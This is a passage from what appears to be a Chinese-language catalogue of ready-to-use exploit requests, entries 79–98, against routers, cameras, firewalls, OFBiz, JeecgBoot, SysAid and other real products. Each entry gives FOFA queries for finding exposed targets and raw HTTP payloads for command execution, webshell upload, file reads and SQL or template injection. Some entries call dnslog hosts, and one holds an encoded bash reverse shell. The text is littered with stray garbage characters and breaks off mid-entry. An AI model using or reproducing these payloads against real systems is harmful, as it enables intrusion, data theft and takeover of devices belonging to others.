' C' F( g3 U5 K& b- ^* iYsOxWxSvj1KyZow1PTsh98fdu6l9 A! u$ A" m% R1 w# h) f- ?
------YsOxWxSvj1KyZow1PTsh98fdu6l& I$ M) x' d: y1 f( W
Content-Disposition: form-data; name="target"
& t$ l H6 D3 W. g( t; t% Z) ?2 H( u1 p: B
/Applications/SkillDevelopAndEHS/
8 A! f# D. @+ O; }- O------YsOxWxSvj1KyZow1PTsh98fdu6l--
# y2 w/ W: E8 c! N: b& [
2 p: c+ t3 | J- W: C( x6 Y
& q. D$ @" d2 V) ]GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1" d8 l7 Q1 h6 V
Host: x.x.x.x2 i( m0 m j6 E3 k
5 ^" x" b4 V1 {6 G1 s$ u' n4 V4 T
" a5 n$ j5 `5 y7 E- @79. BYTEVALUE 百为流控路由器远程命令执行
* U _1 U* ^. W/ X0 Q, c. O) @FOFA:BYTEVALUE 智能流控路由器
R- _ b/ q, O) dGET /goform/webRead/open/?path=|id HTTP/1.16 e) j5 N: H- B' @
Host:IP
2 n3 }$ M6 k, Q/ x9 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0. _* X( Z6 X, i9 _) J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 b* g7 E5 z9 h2 L: e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 C' R K! d; N0 R+ y4 K+ u
Accept-Encoding: gzip, deflate
6 H0 P" Z# { t: J3 ]" @. bConnection: close& h6 `( J9 P; V' T' d
Upgrade-Insecure-Requests: 1
) W( _5 t; \. ~. n" B5 [7 G: e6 {2 \) F
9 X6 E3 U7 _# _+ Y: f80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传/ ~; D2 P, l6 O: w5 V6 k
FOFA:app="速达软件-公司产品"+ W D8 V; h0 P' J% O8 p2 a; ~
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.11 }" v) j4 J! n0 O2 ?4 A! E6 Z
Host: x.x.x.x
1 T3 L, z+ l$ A6 }) E5 C& X0 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' x0 a! }- d1 {3 J$ k6 V
Content-Length: 27+ I5 `/ J- m! ~# M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; o9 H$ o* h& X( W$ N# H
Accept-Encoding: gzip, deflate
& X/ X0 s3 B+ n! }( qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- f7 x' H4 e( ?# p! d3 dConnection: close
% d& c* m' T" j5 @0 AContent-Type: application/octet-stream
& \+ P! V0 q1 S x, V8 {Upgrade-Insecure-Requests: 13 Z) |4 V" R9 y) o+ O
8 j- y2 p$ f) [. ~<% out.print("oessqeonylzaf");%>4 H W q/ C ]% {+ b. p
* a# @: r9 k0 A; x+ r6 f% e
4 d! N. Y9 S, m$ J* g4 u( X/ e
GET /xykqmfxpoas.jsp HTTP/1.1! G2 V+ u$ i6 ^6 n: u
Host: x.x.x.x* H- o/ R! B$ X. W9 T; E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|1 q6 G! x/ D: q3 B+ d+ gConnection: close
% r( U8 f, t; C9 {Accept-Encoding: gzip- w# ?2 A" o, [1 g8 i1 Q$ y
2 D4 C3 H7 b6 e7 ?6 I
( v) U9 Y! [0 @( g81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露1 p0 ]& R( z A
FOFA:app="uniview-视频监控"' u$ x2 E( X$ o1 w
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
% {6 S, {& S: C' l* G3 EHost: x.x.x.x8 V& W: P% p3 o# B8 c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 }7 x* @. d$ |: U
Connection: close
+ a% L- b$ w0 c- |3 pAccept-Encoding: gzip& Q& W1 Z* e3 |
) c- m* l+ A+ V7 C" e7 k S* }" {: |. Y! k, a. F8 B
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
6 G' K7 K- ] Q5 [3 y3 O% y6 o% xFOFA:app="思福迪-LOGBASE"
8 W3 t5 Y' h; A. rPOST /bhost/test_qrcode_b HTTP/1.1+ `8 |! c+ U, L9 C
Host: BaseURL
( ^) k% b$ j$ c6 uUser-Agent: Go-http-client/1.1! H& k" o8 S/ \6 m( x& W( y' y
Content-Length: 23
7 t$ W, s0 ]' A! \% {5 w9 M/ h) mAccept-Encoding: gzip( W0 H$ I( H1 f# W' L
Connection: close* [6 a* }0 N1 `' b$ M# Q
Content-Type: application/x-www-form-urlencoded7 W: Z" v% Q# P N
Referer: BaseURL0 X- c0 N: @8 o8 q: i& ]
, y1 m0 d' k, d: l$ r8 D0 K
z1=1&z2="|id;"&z3=bhost
; w! Y5 p% _+ `! o; k" @' f9 R. w0 O3 H4 s9 x. t: _% [
: J3 E8 _8 n- C! r8 n+ F+ l
83. JeecgBoot testConnection 远程命令执行
5 N/ P$ B X! Q' Z% J K& [FOFA:title=="JeecgBoot 企业级低代码平台"
1 l2 `4 D3 E2 }2 J, g- B; R- e& r9 o# P8 D6 |
, A* y; Z( ?& }$ e/ V5 TPOST /jmreport/testConnection HTTP/1.1, Y2 U) z" D0 P% p, A8 F' Q9 c
Host: x.x.x.x: {1 W! _: s4 H |) H. H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& a4 l! X# w" p) W3 u
Connection: close
. |9 r. k4 N7 ?1 z/ Y0 j* ]6 t) iContent-Length: 8881
6 b& `! O% p2 M6 ~3 Q- l/ \1 aAccept-Encoding: gzip
) t0 m- q$ I% B2 ~Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
; s% z, w) B) Y% MContent-Type: application/json) p: U5 h7 V" F% i, |$ K$ e% ?
4 X: \, g" {+ |: v7 P9 ]( [ W" NPAYLOAD3 B+ m+ b/ R+ W; C+ c
( S( L+ w7 @7 E$ ?2 V. ?84. Jeecg-Boot JimuReport queryFieldBySql 模板注入9 k4 m% D& s' M Y" J" g- E c: Q
FOFA:title=="JeecgBoot 企业级低代码平台"
R* C6 p7 p: J$ b7 B1 s1 ^) C: U7 T8 ]& B. X4 [9 h( x$ {
/ d8 Y/ X7 _, k: z. [6 c6 Y7 b; U* [6 h& r* m7 J) y2 D- z! _
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
) i( Q* t0 P1 C/ f# HHost: 192.168.40.130:8080% X" G( u: a* p5 ]( _( i M b
User-Agent: curl/7.88.1
4 y7 i5 P L2 g3 n c$ [1 CContent-Length: 1568 _( C. I1 C2 A* a: s
Accept: */*3 |4 A# M. Y& |' @; E6 s8 E. s; n
Connection: close( x9 Z& j* j8 d0 |1 P2 T
Content-Type: application/json
N/ e% P7 ]: C( O0 j5 G9 KAccept-Encoding: gzip
: z+ l: S5 G8 ~# M
; Z* b; E3 f4 s% d) [{
2 W4 g7 l5 u, U "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",; W, H! f: E5 j9 ]4 |$ m
"type": "0"8 \" }6 ?7 i- h
}
6 l R. @3 u: @, v# L1 u0 R8 T3 H! ^. l- r
0 |! K* ~( ^0 J/ g! m
85. SysAid On-premise< 23.3.36远程代码执行
9 o# Z2 ^, J1 a, c% F( dCVE-2023-47246
8 r, w, z# D0 [; R3 jFOFA:body="sysaid-logo-dark-green.png"
( Y/ j$ O; x/ ^/ p; E4 G) s* aEXP数据包如下,注入哥斯拉马' v( u' N- H: u2 V, v q+ N: Q
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1' _" H. g1 }, ]/ M
Host: x.x.x.x* J U+ P. f; C( s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 m8 y7 |: D' D
Content-Type: application/octet-stream
2 K4 Q( ~6 x, g( A6 O- hAccept-Encoding: gzip7 h( I% p) b q
& X1 m+ }( C' b d
PAYLOAD
7 e9 y3 R% k1 I6 m1 G, h1 T: o
' H6 @; E9 q% u0 Z回显URL:http://x.x.x.x/userfiles/index.jsp1 [0 Q; u+ j2 z/ L2 u# i4 L
( G" P) k( F. ]* n0 z86. 日本tosei自助洗衣机RCE
; x# h* P& }. g" @6 mFOFA:body="tosei_login_check.php"
! @: g. ]( C l& `& P- d) SPOST /cgi-bin/network_test.php HTTP/1.1
@' I# [2 P* Z% D; ?! D2 t$ EHost: x.x.x.x* ]" U( ~0 D+ F! h
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36+ Z. t* T7 A8 h6 q1 e8 s
Connection: close. D1 }! L+ p* r I7 n/ E
Content-Length: 441 z' Q8 O) j/ `5 N6 i
Accept: */*
( F7 ]- K, M7 f1 H( b& m7 MAccept-Encoding: gzip
! W( C3 m% B* B$ ]Accept-Language: en
. }4 ^( B2 D/ y- @Content-Type: application/x-www-form-urlencoded z0 A; v+ [, k( d
* X. ?1 `3 p( ^9 w# r
host=%0acat${IFS}/etc/passwd%0a&command=ping
7 m* ^8 O& b1 ~( B6 V: S% E: `) z6 w' E. v& w- E" [7 R
/ D. W1 ]1 L4 t; z$ ^
87. 安恒明御安全网关aaa_local_web_preview文件上传8 w* {8 K" l! r/ Z) |
FOFA:title="明御安全网关"
# G8 i$ J8 F* F4 i( C/ hPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1& J9 ~5 z2 S# q; I3 m. w# Q
Host: X.X.X.X
+ n: W( k- _7 F. uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ Z( _1 x" @# Z* a) AConnection: close* R9 ]$ t I) O6 B: J
Content-Length: 198" Y' t. j$ u7 r4 a$ P) T% U
Accept-Encoding: gzip
& M& h, T% R$ b' \8 M( gContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd0 r- q* `0 K( ]5 x2 i
5 ~3 B7 ?+ _2 ?6 M7 L$ m* P--qqobiandqgawlxodfiisporjwravxtvd
) V+ i8 E2 T8 D6 a% lContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
3 w" [9 t" s# L- @Content-Type: text/plain
; O3 ?% y, Z$ W5 I3 V: z; h: M. a/ j: H+ o$ j' o
2ZqGNnsjzzU2GBBPyd8AIA7QlDq; n4 j* K: [. @$ R
--qqobiandqgawlxodfiisporjwravxtvd--8 n5 X! T. @1 O5 S1 [
l6 a6 a4 |6 s5 m( s% M
0 @) r& I9 d' \8 c* x6 ?
/jfhatuwe.php; I: @4 K2 Y. t6 Z6 o; e
$ ]3 w+ T3 f9 Y( ?, h6 d88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行3 S5 ?& ? S c/ w$ Y8 m$ @
FOFA:title="明御安全网关"
. M. O) ^. q* c0 z9 `8 ZGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
9 P: `6 C& _" `Host: x.x.x.xx.x.x.x: s+ I- j, ~5 v. p" N" Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 u, v6 d7 N; s0 H3 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: @& F: L. s: E6 D$ @Accept-Encoding: gzip, deflate7 K% o( @, A3 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; l2 P! N' ^# Y+ z
Connection: close5 C9 }/ N. D7 m* }; y$ R7 F" H1 A- r L) C
2 P6 c- Z/ N0 f/ E) p9 v7 E! S3 j, i4 T& P7 ]9 D
/astdfkhl.php. y& ^! r$ A o, ^- W3 F, {
`3 p( t& b8 b7 C$ T; T89. 致远互联FE协作办公平台editflow_manager存在sql注入8 m- E3 _0 |' `2 _
FOFA:title="FE协作办公平台" || body="li_plugins_download"* k" I- ^4 J% T* r
POST /sysform/003/editflow_manager.js%70 HTTP/1.1- E9 k+ h& j' Y6 m
Host: x.x.x.x
6 G$ c& _" S8 Y! \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 C& I; X* @5 _
Connection: close
0 l) ]( A' L; g, K- \' A8 UContent-Length: 41
+ ?7 f6 ?$ w% \Content-Type: application/x-www-form-urlencoded* n: {4 W3 \% H) P" R O( \4 l! }. M6 {
Accept-Encoding: gzip
, Z; ~* ]( {4 |5 V# o8 T
/ _& b) k8 z [& g" B Ioption=2&GUID=-1'+union+select+111*222--+8 T* k2 q' |+ N- G4 P m/ L1 ~0 F
: H4 m6 S% A0 Z/ J5 |* J9 k) H [
) P9 l. }; |" v( N1 Z( Z/ e90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
/ M9 @/ J/ p& ~: S) v7 r% JFOFA:icon_hash="-1830859634"
}! E7 U/ K5 R# K; \8 R) U) _7 YPOST /php/ping.php HTTP/1.1
% h' Y; {% [( R# m' @% M6 _8 Y, uHost: x.x.x.x6 Q/ G% ~2 B0 O* G+ D" X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
$ }# ~0 C7 M Q EContent-Length: 51
: e1 X, i9 l6 O$ C; w+ ]Accept: application/json, text/javascript, */*; q=0.01
j5 H/ ~0 [1 v7 SAccept-Encoding: gzip, deflate
1 {7 R2 X3 U% V: I7 {" yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! y8 O' F0 k. r4 c9 NConnection: close8 e0 g# {- \/ Z3 S7 L4 O) d
Content-Type: application/x-www-form-urlencoded7 D X1 E4 r( r
X-Requested-With: XMLHttpRequest
- M2 ~' M U% F7 _/ v
0 P6 a7 U9 f; bjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig$ ^) U) v3 E6 ?) X" J; |
) J* q5 |* v+ e! V3 _% g) O5 Z, k1 R7 H7 p/ `9 U" `, B+ Z7 U
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
" ^) G5 H" ?7 i; e/ ^* ?0 }/ K7 ?FOFA:title="综合安防管理平台"
) u `8 Z! z. vGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
$ }/ O+ E v) ?$ W* b" e/ AHost: your-ip% s& Z* G# q: |4 h0 u2 ]8 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
6 K2 D* z- y7 Z' i; J, mAccept-Encoding: gzip, deflate# Y) X# n! a/ m
Accept: */*6 K" [+ \7 \2 w- {- g
Connection: keep-alive }' T: f/ L6 q1 D6 h0 p
a( a' o. ~" S& y u1 t
: G3 z! D, ~4 p# `' K( {
0 E3 ^. n& J! v7 S5 h5 K+ i$ M
92. 海康威视运行管理中心session命令执行9 x( t$ f$ N% ~! Z. H+ m" G
Fastjson命令执行
7 u% F2 D, n: ahunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
: Z; u5 f) h4 ?7 m) JPOST /center/api/session HTTP/1.1 Z X3 N- \- _& u
Host:
+ }4 a" y) P, K0 fAccept: application/json, text/plain, */*" Q, y8 |9 R7 E; ~- t: K
Accept-Encoding: gzip, deflate
5 q8 d, T+ q4 c% n. E HX-Requested-With: XMLHttpRequest
9 b2 t b/ Y( R: V; t; A2 WContent-Type: application/json;charset=UTF-8
* a6 ? b+ ] h$ j1 N; TX-Language-Type: zh_CN1 W! g& @6 |: d( P5 B2 U
Testcmd: echo test
" m) B2 | x- S( [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 s, E" L/ G( @: S8 b' xAccept-Language: zh-CN,zh;q=0.9( V7 Y: h* g2 P# W8 ?' s
Content-Length: 5778
: T) h& n! ~4 p6 X' [4 t V
7 c2 Z5 o4 p) R w* ZPAYLOAD
! |# z/ z9 F% A/ r* X7 g& F$ o: y' f5 i0 {* U
) |3 w/ ?' k8 }' L# E93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
4 ^# j; t$ b, p) [ QFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="+ S1 H5 [' C0 D3 ]- K# w
POST /?g=app_av_import_save HTTP/1.1
3 U$ x" Q' l+ [9 A( H# [: CHost: x.x.x.x* A- p3 ^/ q5 G1 i; Z F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx x7 e( P+ V$ ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% r1 m% ~$ @) C& `; c# Y, \' w( ^
% V) m: N0 ?; x, y------WebKitFormBoundarykcbkgdfx
. J2 X/ x6 g4 }& x, x+ PContent-Disposition: form-data; name="MAX_FILE_SIZE"0 u5 _; Q; _! D1 `, r3 {
/ Y, A' x% k4 H10000000 c' [4 }; R/ y8 I
------WebKitFormBoundarykcbkgdfx+ M8 U) s4 b) ~; _# y' {
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
5 g) i! _$ B; q9 M LContent-Type: text/plain
7 T0 e4 q8 x# z) L, Z4 g7 }4 q+ n
) P& v0 S( Z, R2 ?4 Bwagletqrkwrddkthtulxsqrphulnknxa
" Z# C# \9 N6 m6 K# C' N* h! g+ ~------WebKitFormBoundarykcbkgdfx
+ a7 J7 |$ o N! }2 C8 g% d+ n% RContent-Disposition: form-data; name="submit_post"
- I/ f2 `; F' M6 R6 b% t( O. M- ?' j- F8 T6 {
obj_app_upfile
% v! o+ w, H, Z) x: I o------WebKitFormBoundarykcbkgdfx7 f: X! T* w3 J. D
Content-Disposition: form-data; name="__hash__"
; c3 o7 s) N6 j$ G" y) ?1 {
* N; R- N) u* R: O6 @$ @5 T4 J0b9d6b1ab7479ab69d9f71b05e0e9445
# ` m" {: v# x' W! n------WebKitFormBoundarykcbkgdfx--( X, J' K$ A i$ Z' e% a5 b
- m' ^5 D: w8 B4 _* K
, n- a; D# G' }2 i0 j7 \# ~
GET /attachements/xlskxknxa.txt HTTP/1.17 N2 X; O$ Q* D6 A$ X( U# [
Host: xx.xx.xx.xx
8 l* J' z$ e+ ]( M8 E0 R6 {User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: U9 K; W2 O9 F! r- r0 y" A
8 W/ P# u6 a, _' p5 N
' b5 F* D, T3 x8 S& L
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传% p+ `& W+ T. p9 F* G; l/ _
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
E8 s+ i7 {# x, KPOST /?g=obj_area_import_save HTTP/1.1
3 r# X" M+ S0 ]0 l& m& r: WHost: x.x.x.x
% f4 E9 R# r7 e* x5 p' j" \) NContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt E3 i5 ?9 l' `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36( A! T& m7 y+ Y [
& c; X) a, j3 W4 X* h------WebKitFormBoundarybqvzqvmt& u' |4 C, t; f, T! v' ]/ d# u
Content-Disposition: form-data; name="MAX_FILE_SIZE"
{$ ~! k! @8 }2 f, w" r1 K
m$ @% x7 C, g10000000
6 C% o- c0 F2 j- x------WebKitFormBoundarybqvzqvmt
$ ?3 m: w8 c& ]4 tContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"' D' R1 l; J5 H, b
Content-Type: text/plain+ p: m/ g9 }$ D* b# N
J% J" h0 C. dpxplitttsrjnyoafavcajwkvhxindhmu! @% B, s9 g# W* j. ^
------WebKitFormBoundarybqvzqvmt
/ x" m# j I& _" ^Content-Disposition: form-data; name="submit_post"% N( }) O. V% O) e0 A' G$ w
D7 b+ a3 ?6 R4 k2 E# x5 K
obj_app_upfile
' y1 {1 K/ p" z% p* S; D------WebKitFormBoundarybqvzqvmt( ~2 p. t8 |3 m. @- M! M5 @3 T
Content-Disposition: form-data; name="__hash__"( w$ u. e" c7 l# g" u7 G7 g5 e
& C9 m. U, A8 {! N0b9d6b1ab7479ab69d9f71b05e0e9445
+ {& v' \& I, d3 |) z# Y2 m2 I------WebKitFormBoundarybqvzqvmt--
3 d3 ~) [% e& m5 O- M% y* i4 X& v: [+ r* M+ }3 \; ^
$ ] z/ X S' A, K6 u% c' W
+ \! Z4 u$ f5 K' u: `7 N
GET /attachements/xlskxknxa.txt HTTP/1.1; T- L0 g! }1 I7 z: a! g
Host: xx.xx.xx.xx
H) l2 v# P. |7 ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 z2 \ ?. l8 l) m c
5 G/ Q+ @0 Y1 Q: _- I3 r# M! a( i+ r8 X: v
# f6 U0 b' D; [! \* }. B
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行6 U6 R& |* F t, g9 ]. U2 [9 F6 D
CVE-2023-49070$ q: h9 `& ?! ~1 z( `+ \- N z" Q
FOFA:app="Apache_OFBiz"$ q# U4 R4 k. w3 u4 B. R9 h
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
! o6 {9 D3 v/ S9 m9 g- t" j* wHost: x.x.x.x9 }0 r1 C: N" C. q) Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36! Q5 I6 M: q( ?/ P
Connection: close
9 G. `: I3 l2 a0 z6 l: IContent-Length: 889
' n. z3 Z: A9 oContent-Type: application/xml8 }; ?5 b/ h! F( z$ C, C
Accept-Encoding: gzip; T3 q" i% L6 k
7 w# y; p! C' M9 J0 g<?xml version="1.0"?>
7 |1 {; W1 `! D2 K' H" R<methodCall>
) ?4 T d( q5 O$ e <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>* T* o% ^9 j: _( t
<params>
8 N5 y# x' B( ]- ` <param># ?! \; F6 V" [& s: @
<value>2 G4 |) {1 t- x1 N3 B6 E, D8 j" |
<struct># d9 `: i- G) m& X0 {( e
<member>0 c+ J% [$ C- s
<name>test</name>
. D; U+ t* d' P <value>
" y3 v5 o1 a) W <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
; D. ~, u5 P8 U3 y* Q! i' q </value>
$ u- T! O6 \, T- H) R: L6 h </member>
6 w. Q0 b9 A" Y: G& E' I" v </struct>1 Z5 c; k" K" C6 V! x6 W" ^
</value>( i' q: p- M# {$ o* p# T
</param>
. u7 Q/ v3 `! n) n3 T3 H </params>
; T* h, Z6 z$ Z1 L</methodCall>
+ v9 ~0 D, u$ L* n$ M/ X2 g( S: M3 z. I8 A$ e. G+ e
. u. f. b e$ `7 e: |4 o% w4 \8 x
用ysoserial生成payload
% K3 x, E: P7 Z( F/ l/ P* f S: qjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"- y+ @1 Y1 @1 ]2 d8 _7 I
% {( t' ^3 ]3 X1 F6 s" v+ B8 |' K
" ^" `5 ^8 w4 E3 \2 n( L7 I) q将生成的payload替换到上面的POC
/ k$ Y" Z" d9 V* t( l5 d- YPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
2 z9 J, F! T& r5 z1 MHost: 192.168.40.130:8443/ O. j' Z0 C, h: S7 q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 l: w" j- L+ Q, sConnection: close6 Y9 {3 h/ G3 {3 j, w
Content-Length: 889
% E8 F$ e5 i' Y; H+ N8 MContent-Type: application/xml
% R7 j" r; f! U% w' Q m! qAccept-Encoding: gzip, N) V4 O8 G% N% @
! U$ n& \& c n- M# uPAYLOAD5 r) C+ G7 z1 r( V; g
- |/ _. g5 z7 a4 e4 l8 I. y96. Apache OFBiz 18.12.11 groovy 远程代码执行/ m/ ?0 [" ]3 T. T/ z9 B9 m
FOFA:app="Apache_OFBiz"
" V/ V! L. M. ~! k$ mPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
( ]7 l$ h8 w0 x$ g! U! SHost: localhost:8443
' }$ A4 @) M" Q7 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
2 K: p. e- B9 X% H1 {4 L0 p, _Accept: */*' N/ H3 r& k+ ?0 ^6 {8 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' Q$ r0 d& f+ ?/ T6 NContent-Type: application/x-www-form-urlencoded% K; L) u/ y( T1 a$ t& V* b
Content-Length: 55+ x x1 _4 N+ B. N4 A5 t
$ Q; R/ K4 C JgroovyProgram=throw+new+Exception('id'.execute().text);9 e$ r# W6 G: @
9 D" ^4 B, ~- R! _: x$ f- Y
5 {7 ]( m; R- [9 M$ k9 m9 ]
反弹shell
% X1 n) S4 ~$ v0 a在kali上启动一个监听
$ H6 Y8 c% X" T0 b0 Bnc -lvp 7777
6 O8 b _: R; S" P
( q- h9 m; Y0 F$ U# f5 ?POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
) h/ j# V& y. v2 q, E: U9 ?Host: 192.168.40.130:8443
1 j0 l7 V3 h' `( h6 R0 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
5 \: y( v* S% q' w' hAccept: */*. o4 q8 B3 H2 f& z3 ]& t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; I3 M. u2 y. |. n3 p _( S. M; eContent-Type: application/x-www-form-urlencoded- A# N8 P) D8 M$ p3 r
Content-Length: 71; D- E% V @$ i3 h
4 O/ t" h( ~6 }) ^: o4 [. _% D6 tgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
H! L+ {2 v; w% M& J
G4 D4 Y) T. V* A97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
* D; x6 t7 c8 n6 p) s6 w$ YFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"6 F5 Z0 A7 B" T/ l3 ?0 b0 q/ J, ?
GET /passport/login/ HTTP/1.1
+ M$ Z3 B$ g& i; KHost: 192.168.40.130:8085/ H7 A+ Q& x* q8 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 o$ ^' b3 R/ ]" I- w& M' T0 J J
Accept-Encoding: gzip- t& t2 Y# g" p* z( g
Connection: close, C6 r, |4 i4 G+ v
Cookie: rememberMe=PAYLOAD
8 i& R9 F, h1 B2 _0 v# }7 UX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"8 K. ^0 A# K1 B" M/ V- ]" H1 Z
- a) a# Q V! j( T8 g3 v; s
! V; d0 H! n1 {6 q N98. SpiderFlow爬虫平台远程命令执行8 ]4 c, @( N2 m0 \
CVE-2024-0195" Y4 |% g5 [8 D+ d* r
FOFA:app="SpiderFlow"2 @' A: n1 a U0 b* o0 F, u
POST /function/save HTTP/1.1' l/ r. ^- K; S
Host: 192.168.40.130:8088
' S* l3 S6 |) X& d; ^6 D' \* j4 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ B8 |1 b' z3 B6 Q
Connection: close
E, J- w3 y* W! L! TContent-Length: 121
